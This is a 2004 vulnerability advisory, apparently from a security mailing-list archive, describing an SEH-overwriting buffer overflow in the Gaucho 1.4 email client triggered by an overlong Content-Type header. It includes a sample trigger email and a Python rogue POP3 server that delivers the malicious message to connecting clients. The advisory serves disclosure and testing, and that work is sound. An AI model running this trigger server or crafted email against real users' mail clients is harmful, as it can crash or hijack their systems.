gaucho140.html
Posted Aug 26, 2004
Authored by Tan Chew Keong | Site security.org.sg

Gaucho version 1.4 Build 145 is vulnerable to a buffer overflow when receiving malformed emails from a POP3 server. The overflow is triggered when Gaucho receives, from the POP3 server, a specially crafted email with an abnormally long string in the Content-Type field of the email header. The string overwrites a Structured Exception Handler (SEH) record, which in turn controls EIP, and can be exploited to execute arbitrary code.

tags | advisory, overflow, arbitrary
MD5 | 3382c9b3cbaca0beaf6ed81da2bcec76

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>SIG^2 G-TEC - Gaucho 1.4 Email Client has Buffer Overflow Vulnerability when Receiving Email Headers with Abnormally Long Content-Type Field</title>
</head>
<body>
<span class="headertext">SIG^2 Vulnerability Research Advisory</span>
<p/>
<span class="headertext"><h1>Gaucho 1.4 Email Client has Buffer Overflow Vulnerability when Receiving Email Headers with
Abnormally Long Content-Type Field</h1></span>
by Tan Chew Keong<br>
Release Date: 23 Aug 2004<br>
<p>
<span class="headertext">Summary</span><br>
<br>
<a href="http://homepage1.nifty.com/nakedsoft/">Gaucho</a>
is an email client developed by NakedSoft for Microsoft Windows platforms. Gaucho supports SMTP, POP3 and
other email delivery protocols. Gaucho version 1.4 Build 145 is vulnerable to a buffer overflow when receiving
malformed emails from a POP3 server. The overflow is triggered when Gaucho receives, from the POP3 server, a specially
crafted email with an abnormally long string in the <b>Content-Type</b> field of the email header. The string overwrites
a Structured Exception Handler (SEH) record on the stack; when the exception is dispatched, the overwritten handler
pointer is loaded into EIP, so the flaw can be exploited to execute arbitrary code.
<p>&nbsp;<br>
<span class="headertext">Tested System</span><br>
<br>
Gaucho 1.4 Build 145 on English Win2K SP4
<p>&nbsp;<br>
<span class="headertext">Details</span><br>
<br>
Gaucho version 1.4 Build 145 is vulnerable to a buffer overflow when receiving malformed emails from a POP3 server.
The overflow is triggered when Gaucho receives, from the POP3 server, a specially crafted email with an abnormally
long string in the <b>Content-Type</b> field of the email header. The string overwrites a Structured Exception Handler
(SEH) record on the stack; when the exception is dispatched, the overwritten handler pointer is loaded into EIP,
so the flaw can be exploited to execute arbitrary code. Because the trigger is parsed from a message the client
fetches, an attacker does not need to control the POP3 server itself: any message delivered to the victim's mailbox
with such a header, and left intact by the intervening mail servers, is retrieved and parsed in the same way. A sample
email that will trigger the overflow is shown below.
<p>
<div class="codeBlk">
<code><pre>
Date: Mon, 09 Aug 2004 19:44:13 +0800
Subject: Testing
To: a@aaaaaa.xxx
From: XX <xx@xxxxxxxx.xxx.xx>
Message-ID: <GM109205179359A000.b76.xx@xxxxxxxx.xxx.xx>
MIME-Version: 1.0
Content-Type: <b><font color="#ff0000">AAAAAAAAAAAAA[approx. 280 chars]...</font></b>; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Mailer: Gaucho Version 1.4.0 Build 145

Testing
.
</pre></code>
</div>
<p>
The following OllyDbg screen capture shows that EIP was overwritten when an abnormally long string was
supplied in the Content-Type email header.
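<p>
The following Python script is an added example; it is not the advisory's proof-of-concept (gaucho140poc.cpp)
and not NakedSoft's code. It reproduces the delivery side of the issue: a minimal POP3 (RFC 1939) responder
that advertises a single message, the trigger message from the sample above with a configurable Content-Type
length, and hands it to whichever client connects. The listening address (127.0.0.1:1100), the filler header
values and the default length of 280 bytes (as in the sample) are assumptions. The command handling lives in a
class with no socket dependency, so the session can be exercised without a client. Point only a throw-away VM
running the affected build at the listener, never a production mailbox, and compare the result against Build 151.

```python
import socket

# Constructed trigger message, modelled on the advisory's sample email. The
# header values are filler copied from that sample; only the length of the
# Content-Type value varies (assumed default: 280 bytes).
FILLER_HEADERS = [
    "Date: Mon, 09 Aug 2004 19:44:13 +0800",
    "Subject: Testing",
    "To: a@aaaaaa.xxx",
    "From: XX <xx@xxxxxxxx.xxx.xx>",
    "Message-ID: <GM109205179359A000.b76.xx@xxxxxxxx.xxx.xx>",
    "MIME-Version: 1.0",
]


def build_trigger_message(length=280, filler="A"):
    """Raw message (CRLF endings, headers + body, no POP3 terminator).
    `length` is the number of filler bytes placed in Content-Type."""
    lines = FILLER_HEADERS + [
        "Content-Type: " + filler * length + "; charset=US-ASCII",
        "Content-Transfer-Encoding: 7bit",
        "X-Mailer: Gaucho Version 1.4.0 Build 145",
        "",
        "Testing",
    ]
    return "\r\n".join(lines) + "\r\n"


def content_type_length(raw):
    """Length of the Content-Type media-type token (before any ';'), or None.
    A quick check on a captured message or on what this server sends."""
    for line in raw.split("\r\n"):
        if line.lower().startswith("content-type:"):
            return len(line.split(":", 1)[1].split(";")[0].strip())
    return None


def dot_stuff(raw):
    """POP3 byte-stuffing (RFC 1939 section 3): a line starting with '.'
    gets an extra leading '.' so the client cannot mistake it for the
    end-of-message terminator."""
    return "\r\n".join(
        "." + ln if ln.startswith(".") else ln for ln in raw.split("\r\n")
    )


class MaliciousPop3Session:
    """Command/response state machine for one POP3 session that offers
    exactly one message: the trigger. Any USER/PASS pair is accepted."""

    def __init__(self, message):
        self.message = message
        self.octets = len(message.encode("latin-1"))  # size for STAT/LIST
        self.authenticated = False
        self.quit = False

    def greeting(self):
        return "+OK POP3 ready\r\n"

    def handle(self, line):
        parts = line.strip().split()
        cmd = parts[0].upper() if parts else ""
        args = parts[1:]
        if cmd == "QUIT":
            self.quit = True
            return "+OK bye\r\n"
        if not self.authenticated:              # AUTHORIZATION state
            if cmd == "CAPA":
                return "+OK\r\nUSER\r\nTOP\r\nUIDL\r\n.\r\n"
            if cmd == "USER":
                return "+OK\r\n"
            if cmd == "PASS":
                self.authenticated = True
                return "+OK logged in\r\n"
            return "-ERR authenticate first\r\n"
        if cmd == "STAT":                       # TRANSACTION state
            return "+OK 1 %d\r\n" % self.octets
        if cmd == "LIST":
            if args:
                return ("+OK 1 %d\r\n" % self.octets) if args == ["1"] else "-ERR no such message\r\n"
            return "+OK 1 messages\r\n1 %d\r\n.\r\n" % self.octets
        if cmd == "UIDL":
            if args:
                return "+OK 1 trigger0001\r\n" if args == ["1"] else "-ERR no such message\r\n"
            return "+OK\r\n1 trigger0001\r\n.\r\n"
        if cmd in ("RETR", "TOP"):
            # TOP would normally truncate the body after n lines; the overflow
            # is in the headers, so the whole message is served in both cases.
            if not args or args[0] != "1":
                return "-ERR no such message\r\n"
            return "+OK message follows\r\n" + dot_stuff(self.message) + ".\r\n"
        if cmd in ("DELE", "NOOP", "RSET"):
            return "+OK\r\n"
        return "-ERR unknown command\r\n"


def serve(host="127.0.0.1", port=1100, length=280):
    """Accept one client, play the session, then exit. Assumed address; the
    client under test is configured to poll this host:port."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(1)
        conn, _peer = srv.accept()
        with conn:
            sess = MaliciousPop3Session(build_trigger_message(length))
            conn.sendall(sess.greeting().encode("latin-1"))
            buf = b""
            while not sess.quit:
                chunk = conn.recv(4096)
                if not chunk:
                    break
                buf += chunk
                while b"\r\n" in buf and not sess.quit:
                    line, buf = buf.split(b"\r\n", 1)
                    conn.sendall(sess.handle(line.decode("latin-1")).encode("latin-1"))


if __name__ == "__main__":
    serve()
```

Run the script on the test host, create a POP3 account in the client pointing at 127.0.0.1 port 1100 with any
credentials, and fetch mail once. The listener serves the same headers for RETR and TOP, so a client that only
previews headers is exposed in the same way. Adjusting <code>length</code> lets you bracket the smallest value
at which the client misbehaves, which is the figure to compare across builds.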
<p>&nbsp;<br>
<img src="gaucho140.jpg">
<p>&nbsp;<br>
<span class="headertext">POC Exploit</span><br>
<br>
Proof-of-concept code to validate this vulnerability can be downloaded <a href="gaucho140poc.cpp">here</a>.
<p>&nbsp;<br>
<span class="headertext">Patch</span><br>
<br>
The author has fixed the vulnerability in Version 1.4 <a href="http://homepage1.nifty.com/nakedsoft/Gaucho/Gaucho14.html">
Build 151</a>. Users are advised to upgrade to the fixed version.
<p>&nbsp;<br>
<span class="headertext">Disclosure Timeline</span><br>
<br>
09 Aug 04 - Vulnerability Discovered<br>
10 Aug 04 - Initial Vendor Notification (no reply)<br>
12 Aug 04 - Second Vendor Notification<br>
14 Aug 04 - Author replied with fixed version<br>
23 Aug 04 - Public Release<br>
<p>&nbsp;</p>
<span class="headertext">Contacts</span><br>
<br>
For further questions and enquiries, email the following.
<p />
Overall-in-charge: <a href="mailto:%63%68%65%77%6b%65%6f%6e%67%40%73%65%63%75%72%69%74%79%2E%6F%72%67%2E%73%67">Tan Chew Keong</a>
<p />

<p>

<P><BR>
<span class="footnote">Updated: 23/8/2004</span><BR>
<A href="mailto:%77%65%62%6D%61%73%74%65%72%40%73%65%63%75%72%69%74%79%2E%6F%72%67%2E%73%67" class="smallblackText">webmaster@security.org.sg</A></P>
</body>
</html>
